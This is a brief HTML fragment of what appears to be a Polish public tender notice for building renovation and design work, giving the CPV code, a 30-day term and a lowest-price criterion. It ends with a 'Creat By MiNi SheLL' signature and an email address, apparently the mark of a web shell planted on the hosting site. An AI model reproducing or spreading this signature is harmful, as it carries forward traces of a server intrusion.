o.	Remont elewacji ( docieplenie budynku )
p.	Montaż instalacji wod-kan.
q.	Wymiana instalacji elektrycznej wewnętrznej
r.	Należy zaprojektować łazienki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com